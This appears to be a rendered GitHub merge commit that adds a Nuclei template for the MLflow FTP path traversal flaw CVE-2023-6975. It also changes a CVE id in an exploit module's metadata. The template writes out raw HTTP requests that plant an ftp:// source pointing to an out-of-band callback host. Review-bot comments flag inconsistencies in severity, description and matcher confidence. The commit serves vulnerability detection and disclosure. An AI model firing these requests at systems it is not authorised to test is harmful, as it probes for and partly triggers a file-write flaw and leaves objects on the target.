Merge pull request #9 from protectai/feb-exploit-release

Added mlflow URL parsing confusion Nuclei Template (CVE-2023-6975)
main
Marcello 2024-03-07 09:12:01 -07:00 committed by GitHub
commit 655e78ff31
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 42 additions and 1 deletions


@ -0,0 +1,41 @@
id: mlflow-url-parsing-confusion-lfi
info:
name: MLflow FTP Path Traversal
author: kevin-mizu, byt3bl33d3r
severity: high
description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server.
reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cve-id: CVE-2023-6975
cwe-id: CWE-29
tags: mlflow,ml,cve,path-traversal
variables:
experiment_name: "{{rand_text_alpha(6)}}"
http:
- raw:
- |
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{experiment_name}}"}
- |
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"}
- |
GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
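Review bot: `severity: high` in the info block disagrees with `cvss-score: 9.3` in the classification block; the listed vector (S:C, C:H, I:L) does compute to 9.3, which is the CVSS 3.1 critical band, so either use `severity: critical` or revise the vector and score so all three agree. The single `interactsh_protocol` matcher on `dns` only shows that the server resolved the interactsh hostname while handling the third request, not that an FTP fetch or a traversal took place, so a patched instance that still resolves the source host may match; the `description` should state that confidence level (its wording "write files" also disagrees with the `-lfi` suffix of the `id`). The first two requests create a registered model and a model version named by `experiment_name` on the target and nothing removes them, which the description should mention as a persistent side effect of running the template. `matchers-condition: and` is redundant with a single matcher. Blank lines between the raw request headers and the JSON bodies are not visible on this rendering; if they were dropped by the page that is fine, otherwise each body would be parsed as another header line.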


@ -38,7 +38,7 @@ metadata = {
'license': 'MSF_LICENSE', 'license': 'MSF_LICENSE',
'references': [ 'references': [
{'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'}, {'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'},
{'type': 'cve', 'ref': 'CVE-2023-6025'} {'type': 'cve', 'ref': 'CVE-2023-31036'}
], ],
'type': 'remote_exploit_cmd_stager', 'type': 'remote_exploit_cmd_stager',
'targets': [ 'targets': [
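Review bot: The `references` entry's CVE id switches between CVE-2023-6025 and CVE-2023-31036 (the rendered page loses the +/- markers, so the direction is presumably old to new) while the huntr URL beside it is unchanged, and neither the PR title nor its description mentions this correction, so a reader cannot tell which id the advisory actually assigned or why the mapping changed. A sentence in the commit description, or an inline comment such as `# CVE id corrected; see the huntr reference above`, would record the reason. The enclosing `metadata = {` dict starts and ends outside the hunk.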